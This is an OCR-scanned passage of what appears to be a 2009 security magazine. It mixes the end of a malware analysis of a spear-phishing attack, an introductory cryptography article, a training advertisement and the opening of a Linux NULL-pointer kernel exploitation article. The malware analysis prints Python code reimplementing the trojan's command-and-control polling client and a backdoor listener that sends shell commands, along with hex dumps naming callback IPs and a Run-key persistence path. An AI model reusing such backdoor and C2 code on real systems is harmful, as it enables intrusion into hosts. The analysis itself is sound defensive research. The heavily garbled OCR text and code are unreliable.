HTTP/ 1.1 200 OK 
Content-Length: 6371 
Content-Type: text/ html 

Last-Modified: Fri, 12 Jun 2009 16:05:56 GMT 
Accept-Ranges : bytes 
ETag: "582 12 0ab77ebc9 1 : d67 " 
Server: Microsof t-IIS/6 . 0 
X-Powered-By: ASP.NET 
Date: Sat, 13 Jun 2009 01:50:10 GHT 



czoxMj A 

< 1 DOCTYPE HTWT. PTTRT.TC //TJ3C//DTD HTML 4.01 
<html > 



Figure 15. Fake trojan request and sleep command response 
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ANALYSIS OF A SPEAR PHISHING ATTACK 



Primary and 

Secondary Payloads Analysis 

The file type of the attachment in the 
phishing email is identified as a Microsoft 
Compiled HTML Help (CHM) file. These 
types of files are generally used by 
applications in Microsoft Windows 
environments to offer help and they can 
also be a mechanism for delivering e- 
books. To dump out the contents of the 
CHM file, we used CHMDumper, available 
only on the Mac Platform. This application 
yielded a set of files and directories, but 
the files that yielded the most information 
were the embedded trojan executable 
and the resulting HTML file used to start 
the trojan. Error! Reference source not 
found, on the next page shows the files 
that were dumped by CHMDumper, but 
the emphasis of the analysis is placed on 



svchost.exe and FRB Conference on Key 
Developments in Monetary Economic.htm. 
Figure 3, shown previously in The Primary 
and Secondary Payloads in The Staged 
Attack: Functional Analysis section, shows 
the smoking gun that starts the trojan's 
execution. 

Static Analysis is used first to identify if 
the binary has any protections and then to 
pin point any interesting strings or functions. 
The first step to analyzing the trojan is to 
apply the Unix strings utility on it, which 
shows that the binary is not protected and 
also reveals useful command and control 
data. Several stings of interest also stood 
out. One set turned out to be Base64 
encoded commands, the others were an IP 
address and a URI. We also notice the use 
of HTTP and the use of WinlNet API from the 
imports table, as shown in Figure 6. 



from socket import * 
from base63 import * 
from time import sleep 
import datetiice 

def connect send [host, uri) ] 

re q - ■ ' 'GET ks HTTP/ 1 . 1\ r\ nAccept : */ *\r\ nUser-Agent : chairmen-george+Windows+N 
request ■ req>ur i 

print "Sending the following . \ n host: *tw\ nrequest ^s'"* (host, request) 
s = socketUF_I.NET, SOCK_STREA.M) 
s. connect ( (host,SO] ) 
s , send (request) 
return a 

def get cmd (data) : 

CKici = data, split ( "< ! — ") [1J .split ( M — !>")[□] 
cttid2 = decodestr ing (cmd] 
print "Got Hs %s"% (cmd, emd2 ] 
return cmd, cmdZ 

def cmd_sleep (value) : 
t = int (value) 
t - 2.0 * float (value) 
sleep (t) 

def cmd_download (values) : 

dat, uri = values . split (": ") [1] . ap lit £) 
return dst, uri 



def check_aleep (cmd) : 

if len (cmd, split (":")) > Q and cmd, split ! 
return False 

def check download [cmd] : 

if len ( cmd. split [":") ) > 0 and cmd.. split [ 
return False 



') [0] . lower () 



1 s ' : return True 



' d ' : return True 



Figure 16. Basic implementation of the trojan written in Python 



After using strings to gain insight about 
the trojan, the binary is loaded into IDA Pro 
to identify how the binary is using the noted 
strings as well as perform the static code 
analysis. The IDA Pro analysis helped to 
identify the routines responsible for sending 
the initial connection to the login page, as 
well as identifying the functions responsible 
for downloading another aspect of the a 
malware system. Figure 8 shows what 
host the trojan contacts in order to get 
a new command from the attacker 
Figure 7 shows the routine responsible 
for downloading a At this point, GNU 
Wget is used to grab a copy of the page 
shown in Figure 8. Initially, the commands 
in the page were not evident, but after 
consulting IDA Pro once more, the tokens 
used to by the trojan became apparent. 
Figure 10 shows the block of responsible 
for retrieving the commands from the 
web page. The tokens (<!-- — !>)are 
considered comments and are not parsed 
by the browser; so they do not show up in 
the HTML rendering. 

Dynamic analysis is employed to 
verify the previous assumptions and then 
to identify any functionality that may have 
been missed in the static analysis. For 
the live analysis, a virtual machine with 
mmunity Debugger and Fiddler was used. 

Breakpoints were placed on the 
interesting points discussed earlier. Since 
the trojan is using the WinlNet API, the 
Fiddler Web Debugger program was used 
to monitor communication between the 
trojan and the web server. 

Figure 9 shows Fiddler in action as 
it intercepts web reguests between the 
attackers server and the trojan. This 
method helped to identify the custom HTTP 
User-Agent header used by the trojan. 
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db ' c2xlZXA=' ,□ 
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; Base £4 Decode Command: sleep 


. data 
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align 4 




. data 


004030SC 


aY21k 


db ' T21k' ,0 


; DATA XP.EF: . data : of f_4030£4to 


. data 


□□403091 




align 4 


; Bas*£4 Decode Command: cmd 


. dat a 
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db ' cXVpdA== 1 , 0 


; DATA XP.EF: .data: off 4030£0to 


. data 


□□403OSD 
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; B a s e c 4 Decode C omm and: quit 
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Figure 17. Commands found in the backdoor binary 
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When the host is compromised by the 
trojan, the trojan set the User-Agent header 
to be the host+Windows+NT+5.1, so as an 
example apridgene8fb8+ Windows+NT+5.1, 
the hostname would be apridgen-e8fb8. 
After using Immunity Debugger to verify the 
inputs as shown in Figure 11, focus shifted 
to obtaining the next binary 

Once there was an understanding about 
how the trojan worked, several reguests 
were made to the attacker's server but the 
web page command did not change over 
a period of about twenty minutes. Due to 



the uncontrollable nature of the trojan, a 
Python implementation of the trojan client 
was developed. The client only used the 
sleep and download functions, and the 
reguirements from the functions were 
derived from analysis provided by IDA Pro. 

After testing a few iterations of the 
client, it was left to run unattended. Figure 
16 shows a screen capture of the final 
client for the trojan. Figure 1 5 shows a 
captured reguest between the trojan client 
and the web server The trojan reguest 
is highlighted in the blue box, and the 



command embedded in the server's 
response is highlighted in the red box. 
After about six hours of polling the site, 
the command changed into a download 
command, as shown in Figure 14. Figure 
12 shows the elapsed time from when 
the script started up until the download 
command was issued. Figure 13 on 
the previous page shows the HTTP 404 
response received after trying to retrieve 
the binary for a second time. 

Backdoor Analysis 

The binary file obtained was identified 
using the Unix file command and then 
analyzed with strings. Some of the strings 
found in binary also resembled the ones 
found in the trojan, because they were 
Base64 encoded. Another string that was 
of notable interest was a hard coded IP 
address and port. Further analysis showed 
that this server and port were callbacks 
to the server once the binary executed. 
Figure 17 shows commands seen in the 
trojan that are present in the backdoor This 
relationship has lead to an assumption 
that the backdoor and the trojan are part of 
a similar code base. 

After the initial static analysis, similar 
to what is described in the previous 
subsection, a virtual environment a setup so 
that the backdoor could be analyzed. The 
environment consisted of an Ubuntu box 
with Apache installed, and then a command 
page based on the login.html initially 
encountered. Then the trojan and backdoor 
were modified to keep the traffic internal to 
test network. The malware was modified 
using Radare as shown in Figure 18. 

After the modifying the HTML 
command page, trojan, and backdoor they 
were placed in the web directory in the 
Apache server, and the live analysis was 
performed. The trojan is then downloaded 
to the test host and executed, simulating 
the phishing attack. Once executed, the 
svchostexe polls the web server as it has 
been modified to do. The hard coded HTML 
page commands the trojan to download 
the backdoor and executed it. 

After the backdoor executes, Immunity 
Debugger is attached to the process. As 
mentioned previously, if any errors are 
triggered in the backdoor, it self-destructs 
and deletes itself from the host's disk. 



[ 6x461418 (bs=512 mark=ex6) hexb ] hit32746_l 

[. 

offset 61 23 45 67 89 A B CD E f hi 7^4Sft7RQflRrnFF 

6x66461418, 3236 332e 3232 362e 3232 2e31 3338 000C 263.228.22.138.. 

8x68461428, 6600 0060 6000 0006 0600 0060 0060 6006 

Avfifumaia anno noon nnnn nnran nnnn noon nnon nnnr, 

offset 01 23 45 67 89 A B CD E f ni ?^4'>f l 7RqARrnFF 

6x00401418, 3137 322e 3136 2e35 312e 3906 0600 0066 172.16.51.9 

0x00401428, 6060 6000 0000 0000 0000 0000 0000 0006 

0X00401438, 6000 0000 0600 0060 0000 0000 0000 0000 

0x00401448, 6660 6006 6600 0060 6060 6006 0606 0660 

0x00401458, 2f6c 6f67 696e 2e68 746d 6c00 0000 0000 /login.html 

0x00401468, 6000 0000 0000 0000 0000 0000 0000 0000 

0x00401478, 6060 60O6 6600 0060 0060 6006 6606 0609 

0x00401488, 6060 0000 0000 0000 0000 0000 0000 0000 

0x00401498, CC34 4600 -!3B 4B60 bS36 4606 a83B 4B60 . B@. . 8@. . B@. B@. 

0x004014a8, 6457 357a 6458 4277 6233 4a36 0606 0660 dW5zdXBwb3J0 

0xO04014b8, 6332 786c 5a58 413d 0000 0060 5932 316b c2xlZXA=. . . .Y21k 

0xO04014c8, 6000 0000 6358 5676 6441 3d3d 0000 0000 cXVpdA== 

0x0O4014d8, 2a2f 2a86 2b57 696e 646f 7773 2b4q 542b */* . +Windows+NT+ 

0x004O14e8, 352e 3106 7762 0060 2e65 7865 0600 0600 5. l.wb.-.exe 

0xO04O14f8, 5c0O 0OO0 4745 5400 4854 5456 2f31 2e31 \ ... GET. HTTP/1. 1 

0x00401508, 6000 0O00 2573 2625 7300 0000 2d2d 213e %s %»...--!> 

0x00401518, 6000 0000 3C21 2d2d 0000 0006 5576 6461 <!-- Upda 

0x00401528, 7465 0000 536f 6674 7761 7265 5c4d 6963 te . . Sof tware\Mic 

0X00401538, 726f 736f 6674 5c57 696e 646f 7773 5c43 rosof t\Windows\C 

0x00401548, 7572 7265 6e74 5665 7273 696f 6e5c 566f urrentVersion\Po 

0x00401558, 6c69 6369 6573 5c45 7876 6c6f 7265 725c licies\Explorer\ 

6x00401568, 5275 6e6B 0166 6669 6666 6696 6866 6666 Run 



Figure 18. Trojan modification in Radare 
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<!OOCTYPE HTML PUBLIC •-//WC//OW HTML 4.01 Transitional/ /BV"> 






<Mm\ > 








-head- 








crveta http-equiv="Content-Type" content= text/html ; charset=windows- 1252"> 






<title>Login</title> 








<link rel="stylesheet" href-"techsu5 . ess" 








type="text/css"> 








<link reW'shortcut icon" href="favicon.ico"> 








<seript language= javascript" type="text/javascript"x 








function popupdink, width, height, left, top, scrollbars) { 




war win: 





Figure 19. Commands on a modified login.html page 
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6e\xe8\x8eVGhlIHN5c3RlbSBjYW5ub3QgZmluZCB0aGUgcGF8aCBzcGVjaWZpZWQuDQo= 
64\xOO\xOGQzpcRG 9jdWllbnRzIGFuZC BTZXR0a W5nclxBZGlpb(nlzdH3hdG9yXERlc2t8b3A-»> 



Figure 20. Standard backdoor messages 

Errors that were encountered resulted from 
mistakes in modifying the binary and not 
having a listener available. 

h an effort to speed up analysis, the 
binary functions, a basic server for the 
backdoor was implemented using python. 
The implementation handles listening, 
receiving, and decoding messages, along 
with encoding and sending commands 
back to the backdoor. 

Figure 21 shows a screen shot of 
some of the functions that were used. As 
a brief overview of the code, the setup _ 
listener listens for the connection on 
the specified IP and port. The recv_data 
function receives incoming data on the 

initialized SOCket, and get _ next _ string 

reads the message size and then Base64 
decodes the next size of N characters. 
Figure 21 shows what the typical message 
looks like before they are processed. The 
first four characters indicate the size ASCII 
format, and the proceeding length string 
is processed as data from the backdoor 
Finally, the send _ cmd takes a command 
string and a socket and sends the 
backdoor a Base64 encoded command 
over the established socket. 

Figure 21 shows a custom backdoor 
listener in action. Line 302 shows listener 
being set-up and waiting for the connection. 
On Line 303, shows a cmd command being 
sent to the backdoor This command invokes 
the backdoor's command environment. 

The rubbish (e.g. dir C:\textbackslash) 

is ignored by the command initialization 
routine. Here it shows the initial connect 
string sent by the backdoor followed by a 
Base64 encoded prompt with the current 
working directory. Line 305 shows a listing 
of the current working directory. Line 306 
and 309 process the command and 
print it, respectively. Other commands in 
this backdoor's environment include cd 
which that changes the current working 
directory, and then guit and exit leave the 
environment. The only other command the 
backdoor seemed to respond to was the 
guit command. This command makes the 



backdoor self-destruct and exit. Any other 
input to the backdoor was simply ignored. 

Mitigations 

Spear phishing attacks do not reguire 
any sophisticated tools ortechnigues. 
Much of the material covered in this 
documented are well known as a means of 
gaining access and taking over a system. 
Furthermore, the binaries employed in this 



case were not sophisticated nor were they 
protected. An additional note about the 
binaries is how easily they can be modified 
with a hex editor so the source code is 
not necessary to customize the attack or 
deploy the binaries, because they can edit 
the binaries to suit their needs. 

Preventative measures reguired to 
mitigate this threat reguire user awareness 
and training in addition to drills that test 



from socket import * 

from ]oase64 import encodestr ing, decodestring 



def setup_listener (host_inf o) : 

s = socket (AF_INET, SOCK_STREAM) 
s .bind (host_inf o) 
s . listen (1) 
x = s. accept (} 
return x 

def connect_cmd (sock) : 

sock, send ( ' Y2 9ubmVjdA== 1 ) 

def start_cmdshell (sock) : 

sock, send (encodestr ing ( "cmd") . replace ( "\ n", 1 ' ) 



def get_next_str ing (d, 3) : 
1 = d[:4] 

1 = 1. split ( 1 \ xOO' ) [O] 

if len(d[4:4+int (1) ] ) != int(l): 

d += s.recv(809 6) 
x = d[4:4+int (1) ] 
return x, d[4+int(l):] 

def recv_data(s) : 

data = s.recv(8096) 

results = [] 

d = data 

while d ! = ' 1 : 

r,d = get_next_string (d, s) 
results . append (decodestring (r ) ) 

return results 

def send_cmd (c, s) : 

s . send (encodestr ing (c) . replace ( "\ n", 1 1 ) ) 



Figure 21. Basic backdoor listener and server implementation in Python 
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the response of IT staff and users {Rachna 
Dhamija, J.D. Tygar, and Marti Hearst "Why 
Phishing Works", CHI 06: Proceedings of 
the SIGCHI conference on Human Factors 
in computing systems. 2006). Additionally, 
host based firewalls and network proxies 
can limit the ability of rogue programs 
from creating network connections. 
Sophisticated systems can bypass these 
protections, but such technology would 



have limited this attack. Detective measures 
are limited. In this particular case, since the 
commands of the trojan are limited and 
embedded in a known token, webpages 
can be checked for those particular strings. 
Another detective measure is the trojan, 
svchostexe running as the particular user 
as shown in Figure 23. Also auditing and 
monitoring programs that run at start-up 
is another measure of detection. Detecting 



In [3*2]: s.addr ■ setup_listener(C172.16.51.9\ 443)) 
In [J*J]: send c«JCc«d dir C:W, s) 



In [3*4] : « 

■ 2ti 'Y29ub«Vjd 



^\xee\xe00zpcR09jdWHbnRzI0FuZCBTZXReaW5ncl)(BZ01pb«»l2dHJhd<i9yXERlc2teb3A+' 



In [MS]: send cadfdir Ct\V, s) 

In [3M]: f ■ recv data(s) 

In (3«9): print <". join(f) ) 
Volume in drive C has no label. 
Volume Serial Number is 98W-C8SJ 



Directory of C:\ 

92/2212999 11:15 AH 8 AUTOEXEC.BAT 

85/87/3999 86:51 PM <01ft> Brother 

92/22/2669 11: IS AM S CONFIG.SYS 

82/27/2899 62:22 PM <DIR> Data 

82/22/2999 11:19 AM <DIR» Documents and Settings 

92/27/2699 62:12 PM <OIR> peach 

86/22/2869 64:61 PM <OIR> Program Files 

92/27/2999 62:23 PM <DIR> Python 

62/27/2969 62:64 PM Olffc. Fython25 

95/87/2999 66:54 PM <DIR> WINDOWS 

2 File(s) 8 bytes 

S Dir(s) 35.535,245,312 bytes free 
C:\Docuraents and Settings\AdDinistrator\r>esktop> 



Figure 22. Python implementation of the backdoor listener environment 



3 

File Options View Shut Down Help 



ows Task Manager 



Applications Processes Performance Networking Users 



Image Name 

lsass.exe 

msmsgs.e'e 

rnysqld.exe 

services.exe 

srnss.exe 

-5p C10I5 .■ .e ■ e 

stacheck.exe 

svchost.exe 

svchost.exe 

svchost.exe 

svchost.exe 

svchost.e \e 



User Name 
SYSTEM 
Administrator 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 
SYSTEM 

NETWORK SERVICE 
SYSTEM 

NETWORK SERVICE 



CPU 

02 
00 
00 
00 
00 
00 
00 
00 
00 
00 
00 
02 



■ l ! '? nr fffV J H 

svchost[l].exe 



Administrator 



00 

n? 



Mem Usage 

1,324 K 
1,923 1 
15,596 K 

3,1:30 y 

3B8K 
6,604 K 
1 1 , 340 I 
5,684 K 
4,683 K 

4,104 K 
27,256 I 
3 , 37b 1 



3,930 1 



ivstern Idle Process SYSTEM 89 28 K 

taskmgr.exe Administrator 04 1,828 K 

TPAutoConneot.exe Administrator 00 3,992 K 

TPAnrnrnnnSvr.eYft SYSTFM fin 3J*fifl K 



After Download 
of the Update 



Qshow processes from all users 



Processes: 41 CPU Usage: 25% Commit Charge: 289M / 2748M 



-zorr 



m im 



Figure 23. svchost.exe running as the user 



the backdoor may follow a much more 
different course of action. If the backdoor 
communicates over a port 443, as it did 
in this case, the Base64 plaintext could be 
considered an anomaly. 

Conclusion 

This report covers the analysis of rea 
world spear phishing attack. To analyze 
this attack we performed static analysis 
of all binaries, dynamic analysis of all 
executables, modified executables for 
dynamic manipulation in controlled 
environment, and we performed basic 
reconnaissance against live C&C hosts. 

The tools and technigues were well 
organized and carefully crafted for a low 
noise attack. The attacker demonstrated 
experienced use of Windows based 
network communication and command 
execution. He further demonstrated basic 
knowledge of botnet command and control, 
which he implemented in an effective 
toolkit. The toolkit does not appear to utilize 
code from public or well-known botnets, 
and lacks sophisticated exploitation and 
protection mechanisms. The attacker also 
successfully established C&C servers and 
hid his identity. This leads us to believe 
the attacker is an actually an experienced 
criminal organization that carefully targeted 
the financial organization. 

The authors are not aware of how the 
attack was initially detected. A few notable 
activities may have alerted security such 
as a CHM file being blocked at the emai 
filter the files being written and undeleted 
from disk, the dropper immediately writing 
to the registry, or HTTP traffic over port 443 
rather than HTTPS. However, we have seen 
similar malware effectively used on other 
systems - usually without any detection. We 
recommend standard mitigation such as 
continued user awareness training, up-to- 
date antivirus software, host based firewalls 
limiting outbound connectivity, and network 
proxies that limit and monitor traffic. 
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Difficulty 



WHAT YOU WILL 
LEARN... 

Understand the different 
forms and applications of 
cryptographic methods 

WHAT SHOULD YOU 
KNOW... 

No specific knowledge required 



Methods of 
Secrecy 



Keeping data secret has been important from the very moment 
knowledge was able to confer a benefit to others. Ancient 
Roman ruler Julius Caesar used an encryption scheme called a 
substitution cipher. 



Keeping data secret has been important 
from the very moment knowledge was 
able to confer a benefit to others. Ancient 
Roman ruler Julius Caesar used an encryption 
scheme called a substitution cipher - Suetonius 
described it as the following: 

If he had anything confidential to say, he wrote 
it in cipher, that is, by so changing the order of the 
letters of the alphabet that not a word could be 
made out If anyone wishes to decipher these, and 
get at their meaning, he must substitute the fourth 
letter of the alphabet, namely D, for A, and so with 
the others. 

Encryption ciphers like the one used by 
Caesar are but one of the most primitive of 
methods which can be used for keeping data 
safe. This article is the beginning of a series which 
will introduce you to a variety of topics related to 
data security. 

Let's go key-sharing 

One of the effective ways to keep data secret 
involves keeping others away from it. If the 
document is enclosed into an opague box which 
you can't open, you cant read it - nothing simpler 
than that. 

Symmetric key algorithms can be considered 
digital implementations of the aforementioned 
box. Two individuals agree on key X. The sender 
then encrypts the message using the key and 
the receiver decrypts it using the same key: see 
Figure 1. 



Block ciphers are among the most easy- 
to-understand algorithms. They take a key and 
the same number of bytes of payload and then 
perform whatever processing they feel like in order 
to combine the bytes. The receiver then reverses 
the processing to split data and key and ends up 
with the original data once again. 

Various block ciphers like AES, BlowFish and 
various DES variants are currently used on the 
market. 

Unfortunately useful data payloads rarely 
come in 64, 1 28 or other set sized bit packages, 
and tend to be significantly longer than the key 
used for encryption purposes. Various methods 
like ECB are used to stretch the key, each with its 
own strengths and weaknesses - but, more on 
that later. 

Stream ciphers use the aforementioned key 
to seed an algorithm which generates an infinite 



Warning 

NIH syndrome tends to be lethal when cryptography 
is concerned. The development of successful and 
safe encryption algorithms is a science of its own. 
Detecting algorithmic flaws is extremely difficult 
for untrained programmers - an algorithm which 
looks safe to you can have extremely dangerous 
properties. 

As many high-quality cryptographic algorithms 
are available as open-source libraries (and 
sometimes even come as part of an IOS or runtime 
environment), Joe Coder should and MUST NOT 
attempt to write his own! 
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(but deterministic) stream of bytes out of 
the seed, and then uses this stream to 
encrypt the payload on a byte-by-byte 
level. The sender initializes his copy of the 
generator algorithm with the same value, 
reverses the processing and ends up 
with the payload (as the byte sequence is 
the same). 

Most encryption methods currently on 
the market use symmetric key algorithms, 
h general, the security of data encrypted 
with these systems depends on both 
the algorithm used and the length of 
the key - the stronger the algorithm and 
the longer the key, the longer it takes to 
perform a brute-force attack to decrypt 
the cipher text by force. 

Key-Sharing, no More 

Unfortunately, all of the above-mentioned 
algorithms share one weakness: an 
encryption key must be transferred 
secretly from one partner to the other 
As this involves the creation of a 
secure channel, why not transfer the 
data unencrypted rather than wasting 
loads of CPU cycles on encryption and 
decryption? 

OK, this might be a bit far-fetched 
- but it proves the main and conceptua 
weakness of so-called symmetric key 
algorithms. Asymmetric key cryptography 
is smarter - it uses a public and a private 
key and a public repository. 

Data is put into the repository via the 
public key, which is published to the world. 
Decrypting the data in the repository, 
however, requires the private key - which, 
obviously, is not published. The chart 
below explains the process further see 
Figure 2. 

The most popular example for 
this process is a program called 
PGP (Pretty Good Privacy). PGP users 
generate a key pair, and upload the 
public key to a server. Others then use 
this key to generate ciphertext, which 
is emailed to the owner of the key. He 
then decrypts it via his private key (see 
Listing 1). 

Unfortunately, these systems do 
come at a price: their CPU utilization 
is significantly higher than the CPU 
utilization caused by symmetric key 
algorithms. A test performed by the 



security researchers Daswani and Boneh 
showed that RSA (an asymmetric key 
algorithm) was about 1000 times slower 
than DES. 




Sender 



Furthermore, the question of key 
management remains: how do you 
know whether the public key you find on 
a server really belongs to the intended 





Figure 1. Symmetric encryption algorithms use one shared key Data can be read i 
everybody who has this key 







Sender 



Reciver 



Original | public key > Encrypted private key > Original 



Figure 2. Asymmetric encryption systems use two keys. One is used for encrypting, 
the other for decrypting. 




Figure 3. Image from http://en.wikipedia.0rg/wiki/File:Cap_c0de_screensh0t.jpg 
CAP: dots embedded into pictures show where a film came from 
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Listing 1. PGP generates ,key pairs". One is private, the other public 

C:\Program Files\GNU\GnuPG>gpg — gen-key 

gpg (GnuPG) 1.4.10; Copyright (C) 2009 Free Software Foundation, Inc. 
This is free software: you are free to change and redistribute it. 
There is NO WARRANTY, to the extent permitted by law. 

Please select what kind of key you want: 

(1) RSA and RSA (default) 

(2) DSA and Elgamal 

(3) DSA (sign only) 

(4) RSA (sign only) 
Your selection? 1 

RSA keys may be between 1024 and 4096 bits long. 
What keysize do you want? (2048) 2048 
Requested keysize is 2048 bits 
Please specify how long the key should be valid. 
0 = key does not expire 

<n> = key expires in n days 

<n>w = key expires in n weeks 

<n>m = key expires in n months 

<n>y = key expires in n years 
Key is valid for? (0) 0 
Key does not expire at all 
Is this correct? (y/N) y 

You need a user ID to identify your key; the software constructs the user ID 
from the Real Name, Comment and Email Address in this form: 
"Heinrich Heine (Der Dichter) <heinrichh@duesseldorf . de>" 

Real name: hakin09 tester 
Email address: test@example.com 
Comment: none 
You selected this USER-ID: 

"hakin09 tester (none) <test@example . com>" 

Change (N)ame, (Oomment, (E)mail or (O) kay/ (Q) uit? O 
You need a Passphrase to protect your secret key. 

We need to generate a lot of random bytes. It is a good idea to perform 
some other action (type on the keyboard, move the mouse, utilize the 
disks) during the prime generation; this gives the random number 
generator a better chance to gain enough entropy. 
. . . .+++++ 
+++++ 

We need to generate a lot of random bytes. It is a good idea to perform 
some other action (type on the keyboard, move the mouse, utilize the 
disks) during the prime generation; this gives the random number 
generator a better chance to gain enough entropy. 

+++++ 

. . . +++++ 

gpg: C:/Documents and Settings /TAMHAN/Application Data/gnupg\trustdb.gpg: trustd 
b created 

gpg: key 9B3349A7 marked as ultimately trusted 
public and secret key created and signed. 



O] .g 

gpg 
gpg 

pub 

uid 
sub 



checking the trustdb 

3 marginal (s) needed, 1 complete (s) needed, PGP trust model 
depth: 0 valid: 1 signed: 0 trust: 0-, Oq, On, 0m, Of, lu 
2048R/9B3349A7 2009-11-06 

Key fingerprint = 40BD BC60 A224 4B87 9781 9CD6 CCA4 7183 9B33 49A7 

hakin09 tester (none) <test@example . com> 
2048R/27F27207 2009-11-06 



C:\Program Files\GNU\GnuPG> 



recipient, and that the corresponding 
private key has not been compromised? 

Value is in the 
Eye of the Beholder 

Present-day encryption algorithms 
such as the ones which will be covered 
in the next parts of the series have 
now reached a point where attacking 
them computationally is no longer 
feasible. Instead, attackers who fail at 
social engineering employ methods 
euphemistically called black-bag and 
rubber hose cryptanalysis. 

The first of the two involves sneaking 
up onto the terminal where the data is 
being used, and monitoring it in some 
way Various methods have been devised 
over the years: they range from mundane 
things like keyloggers and cameras 
to exotic high-tech maneuvers like 
analyzing the sounds of key strokes or 
electromagnetic emissions from monitors. 
Rubber-hose cryptanalysis is simpler: it 
refers to hitting the owner (and the owner's 
family and friends, for the communistically 
inclined) of the password with a rubber 
hose until it gives up and discloses the 
access codes. 

Rubber hose and black-bag 
cryptanalysis rely on one thing: the 
attacker needs to know that data is there. 
If the attacker doesn't know that hidden 
information exists (or thinks that he has 
already decrypted it), the owner of the 
information gets left alone. 

Steganography involves the hiding of 
payload information into another transfer 
medium which is meaningful in itself. 
For example, ancient Greeks shaved the 
heads of their slaves and tattooed the 
message onto their skull. As human hair 
has a tendency to grow, the message was 
soon invisible - and nobody really cared 
about the exchange of a piece of human 
farm eguipment back then. 

As slaves have become somewhat 
rare nowadays, present-day steganography 
uses carrier files which contain large 
amounts of redundant data (usually images 
and MP3 files), and embeds the information 
into them. By keeping the relationship 
between payload and original data in 
check, the original file is not distorted in a 
visible fashion - nobody would ever expect 
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to find a hidden message embedded into 
that shot of a Viennese church. 

Deniable encryption goes along the 
same lines, but has a different intention: 
it allows the user to give up a decoy 
password which leads to an intended 
second decrypted text. 

Let's assume that a gang of 
rebels wants to transmit an order to 
burn 500 cars, smear 300 buildings 
and kill 200 people next Sunday. 
Unfortunately, the recipient is in jail - and 
is forced to reveal a password. He then 
reveals the decoy which leads to the 
decryption of the words capitalists stink 
- a feasible statement for the situation. 

Is it Really From You, Sire? 

One extremely interesting application of 
the abovementioned techniques involves 



watermarking and signing. Watermarking 
is used to embed a token into a file, which 
can then be used to determine where the 
file was coming from. Primitive systems 
ike the CAP code embed visible dots 
into films (see Figure 3), while others use 
steganography to embed the information 
in a hidden fashion. 

Finally, digital signatures can be used 
to verify the authenticity and integrity of 
digital documents, images and other files. 

Future Outlook 

Cryptography and Stenography are 
fascinating and vast fields of science 
which can't possibly be covered 
completely in a single book, let alone a 
single article. This article is intended to 
introduce you to the various methods 
which can be used to keep data secret. 



From the next issue onwards, expect 
further articles which will look at each topic 
in more detail... 



Tamin Hanna 

Tarn Hanna has been in the mobile computing industry 
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about mobile computing: 
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Hakin9 and Sequrit sponsored ECSA/LPT Bootcamp CBT Videos. 

Video Format ready for IPOD/IPHONES and other Portable Media Devices 

The ECSA/LPT training program is a highly interactive security course designed to teach Security Professionals the 
advanced uses of the available methodologies, tools and techniques required to perform comprehensive information 
security tests. Students will learn how to design, secure and test networks to protect your organization from the threats 
hackers and crackers pose. By teaching the LPT methodology and ground breaking techniques for security and penetration 
testing, this course will help you perform the intensive assessments required to effectively identify and mitigate risks to the 
security of your infrastructure. As students learn to identify security problems, they also learn how to avoid and eliminate 
them, with the course providing coverage of analysis and network security-testing topics. This course will help prepare you 
to pass exam 412-79 to achieve EC-Council Certified Security Analyst (ECSA) certification 



Sequrit is an EC-Council Authorized Training Provider. We have invited the best security trainers in the industry to help us 
develop the ultimate training and certification program which includes everything you will need to fully prepare for and pass 
your certification exams. This officially endorsed product gives our students access to the exam by providing you with a 
Voucher Number. The EC-Council Voucher Number can be used at any Prometric center, this voucher number is required 
and mandatory for you to schedule and pay for your exam. Without this voucher number Prometric will not entertain any of 
your requests to schedule and take the exam. 
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WHAT YOU WILL 
LEARN... 

How linux virtual memory works 

What segmentation faults are 
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The landscape of kernel exploitation techniques is very wide and 
evolves all the time. The kernel developers apply more and more 
protection measures to cover all the attack vectors and (not only) bad 
guys are inventing new sorts of attacks, exploitation methods and 
ways to bypass the existing mechanisms. Almost like an arms race. 



Once in a while somebody kills a new 
one of a kind, fascinating vulnerability. 
This effectively forces new ground rules 
for the exploitation prevention. A perfect recent 
example would be the discovery made by Mark 
Dowd, researcher in IBM ISS's X-Force team 
- he released the paper on it in April 2008. 
He managed to reliably exploit NULL pointer 
dereferences, a very common condition in many 
applications, by leveraging the ActionScript virtua 
machine. Another good example is the Brad 
Spengler's (the author of grsecurity) exploit for a 
TUN/TAP driver which, when looking at the source 
code then discovered it was unexploitable! GCC 
compiler's optimization engine did the trick by 
removing a NULL pointer check from the code. 

We are explaining a relatively new issue in 
this article: a NULL pointer dereference, a very 
common bug, which can be exploited for privilege 
escalation. What is interesting about NULL 
pointer dereferences in particular, is that when 
talking about local root exploitation of the Linux 
kernel until Linux 2.6.23, there was no prevention 
mechanism at all - nothing could stop you from 
mapping page zero. 

To understand the mechanisms of exploits 
for NULL pointer errors, we need to recall how 
Linux manages the memory of the process, 
what are segmentation faults and how to evade 
them to use memory at address 0x0 without 
any limitations. We restrict ourselves to 32-bit 
machines running Linux. 



Virtual Address Space 

Processes operate on virtual memory. The 
Virtual Address Space (VAS) is usually divided 
into 4KB chunks called pages. For each 
process in the system, the kernel keeps a 
Process Descriptor (task _ struct). These 
structures contain all the information about 
the process, including the registers state to be 
restored when the process gets its processor 
time slice. One of the control registers, CR3, 
points to a multi-level page description 
structures. Virtual pages can be mapped 
to physical memory, file contents etc. as 
necessary (see Figure 1). 

h 32-bit Linux systems it's possible to 
address 2"32 memory cells - 4GB. The 
processes in the user mode can use directly 
only the first 3GB of the memory so it's called 
user space. The addresses between 3GB 
and 4GB (the last addressable gigabyte) are 
the same for every process and are used by 
the kernel, so they're called kernel space. The 
situation is different, when the HUGEMEM kernel 
is used, so both user space and kernel space 
are 4GB large (using separate virtual memory 
mappings), but let's ignore it as it is not in 
common usage. 

A process accesses the kernel space when 
it enters the Kernel Mode (as a result of a system 
call or an IRQ). 

The operating system performs memory 
allocations for each process using memory 
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maps with simple permissions - read, 
write and execute. To see the maps for 
the particular process, check /proc/ 
<pio>/maps file (see Figure 2). When a 
program tries to access a page that is 
not mapped or has inappropriate access 
rights, a page fault will occur. 

This mechanism is supported by 
the processor's protected mode, initially 
introduced in the 80286 processors and 
extended in 80386. 

NULL Pointers Magic 

h the software development 
process it's very common to commit 
a segmentation fault error. The 
developers know how to deal with it 
and what it causes, but they might 
underestimate it. They would probably 
care more if they knew that black and 
white hats hunt for them day and night, 
because it might come with a hidden 
exploitation potential. 

So what does it actually mean, when 
a process execution finishes like this? 

Program received signal SIGSEGV, 
Segmentation fault. 

Well, SIGSEGV is a signal sent to the 
process when it tries to access protected 
or unmapped part of the memory. The 
default action (if the particular process 
has no exception handler) is abnorma 
process termination. 

